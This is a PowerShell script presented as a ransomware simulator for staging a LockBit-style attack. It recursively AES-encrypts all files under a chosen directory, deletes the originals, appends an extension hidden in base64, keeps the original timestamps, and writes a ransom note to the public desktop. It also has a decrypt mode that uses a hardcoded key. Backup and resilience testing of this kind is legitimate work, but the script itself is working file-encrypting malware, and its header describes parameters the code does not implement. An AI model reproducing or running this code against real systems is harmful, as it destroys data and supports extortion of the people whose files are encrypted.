<# .SYNOPSIS Release: Beaux Ransomware Simulator that leverages AES symmetrical encryption to target specified file types based on defined starting path and all sub-directories. e.g. c:\fileshares .DESCRIPTION This powershell script encrypts or decrypts files using a symmetrical key using AES encryption .EXAMPLE .\RanSimV2.ps1 -e "C:\Files" To decrypt encrypted files: .\RanSimV2.ps1 -d "C:\Files" .PARAMETER Target File Path Specify a the root directory that will be targeted along with sub-directories for file encryption. Example c:\fileshares .PARAMETER FilesTypes This parameter is mandatory, but can be adjusted to which file types to encrypt. Wild cards are suppoorted for files such as *.doc* which will encryption .doc and .docx. Office : Will generate files with the following extensions: "*.pptx","*.docx","*.doc","*.xls","*.rft","*.txt",".pdf","*.ppt",,"*.dot" Multimedia : Will create random files with the following extensions : "*.avi","*.midi","*.mov","*.mp3","*.mp4","*.mpeg","*.mpeg2","*.mpeg3","*.mpg","*.ogg" .PARAMETER File Extension This parameter is mandatory and defines what the encrypted files will be appended with once attacked. Example .encrypted .PARAMETER Encryption key This parameter is mandatory and is the plain-text AES encryption key used for both encryption and decryption. A pre-defined key is provided. A new key can be generated and replaced in the global variables. .NOTES The script will encrypt or decrypt from the file target path and all sub-directories below. Encryption extension will be appended to encrypted files. You can choose which file types by extension will be encrypted in the global variables. // David Siles - dsiles@rubrik.com Simulate a LockBit attack and stage a ransom note #> #User Variables $Mode = $args[0] $Directory = $args[1] $RansomNoteLocation = "C:\Users\Public\Desktop\Restore-My-Files.txt" $Key = "V2VUaGVCZXN0" $TargetFiles = '*.*' # Help function Show-Help { Write-host ; Write-Host " Info: " -ForegroundColor Yellow -NoNewLine ; Write-Host " This tool helps you simulate encryption process of Ransomaware" Write-Host ; Write-Host " Usage: " -ForegroundColor Yellow -NoNewLine ; Write-Host ".\PSRansom.ps1 -e Directory" -ForegroundColor Blue Write-Host ; Write-Host " .\PSRansom.ps1 -d Directory" -ForegroundColor Blue Write-Host " Decrypt target files" -ForegroundColor Green Write-Host " " -NoNewLine ; Write-Host } # Errors if ($args[0] -like "-h*") { Show-Help break } if ($args[0] -eq $null) { Show-Help Write-Host "[!] Not enough parameters!" -ForegroundColor Red break } function Invoke-AESEncryption { [CmdletBinding()] [OutputType([string])] Param( [Parameter(Mandatory = $true)] [ValidateSet("Encrypt", "Decrypt")] [String]$Mode, [Parameter(Mandatory = $true)] [String]$Key, [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")] [String]$Path ) Begin { } Process { switch ($Mode) { "Encrypt" { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { break } $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName) $lastWrite = $File.LastWriteTime $encryptor = $aesManaged.CreateEncryptor() $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length) $encryptedBytes = $aesManaged.IV + $encryptedBytes $outPath = $File.FullName + $x0r $outPath [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes) (Get-Item -Path $outPath).LastWriteTime = $lastWrite } "Decrypt" { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { break } $cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName.replace($x0r,"") $aesManaged.IV = $cipherBytes[0..15] $decryptor = $aesManaged.CreateDecryptor() $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16) $outPath [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes) (Get-Item -Path $outPath).LastWriteTime = $File.LastWriteTime } } } End { } } function CreateReadme { $RansomNote = "All your important files are encrypted!`nAny attempts to restore your files with the thrid-party software will be fatal for your files!`nRESTORE YOU DATA POSIBLE ONLY BUYING private key from us.`nThere is only one way to get your files back:`n`n1) Through a standard browser(FireFox, Chrome, Edge, Opera)`n| 1. Open link ########################################`n| 2. Follow the instructions on this page`n`n2) Through a Tor Browser - recommended`n| 1. Download Tor browser - ######################################## and install it.`n| 2. Open link in TOR browser - ########################################`n This link only works in Tor Browser!`n| 3. Follow the instructions on this page`n`n`n ### Attention! ###`n # lockbit-decryptor.### may be blocked. We recommend using a Tor browser to access the site`n # Do not rename encrypted files.`n # Do not try to decrypt using third party software, it may cause permanent data loss.`n # Decryption of your files with the help of third parties may cause increased price(they add their fee to our).`n # Tor Browser may be blocked in your country or corporate network. Use ######################################## or use Tor Browser over VPN.`n # Tor Browser user manual ########################################" $RansomNote | Out-File -FilePath "$RansomNoteLocation" } function EncryptFiles { foreach ($i in $(Get-ChildItem $Directory -recurse -include $TargetFiles -exclude *$x0r,readme.txt | Where-Object { (! $_.PSIsContainer)} | ForEach-Object { $_.FullName })) { Write-Host "[e] Encrypting $i :" -ForegroundColor Red Invoke-AESEncryption -Mode Encrypt -Key $Key -Path $i Remove-Item $i } } function DecryptFiles { foreach ($i in $(Get-ChildItem $Directory -recurse -filter *$x0r | Where-Object {( ! $_.PSIsContainer )} | ForEach-Object { $_.FullName })) { Write-Host "[d] Decrypting $i :" -ForegroundColor Green Invoke-AESEncryption -Mode Decrypt -Key $Key -Path $i Remove-Item $i } Remove-Item "$RansomNoteLocation" } #Main $x0r = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("LmxvY2tiaXQ=")) $shaManaged = New-Object System.Security.Cryptography.SHA256Managed $aesManaged = New-Object System.Security.Cryptography.AesManaged $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $aesManaged.BlockSize = 128 $aesManaged.KeySize = 256 $aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key)) if ($Mode -eq "-d") { Write-Host ; Write-Host "[!] Decrypting $DirectoryTarget directory.." -ForegroundColor Green Write-Host "[i] Decrypted all files.." -ForegroundColor Green DecryptFiles Start-Sleep 1 } else { Write-Host ; Write-Host "[!] Simulating encryption on $DirectoryTarget directory.." -ForegroundColor Green Write-Host "[!] Encrypting all files.." -ForegroundColor Red CreateReadme EncryptFiles } $shaManaged.dispose() $aesManaged.dispose() Start-Sleep 1 Write-Host "[i] Done!" -ForegroundColor Green Write-Host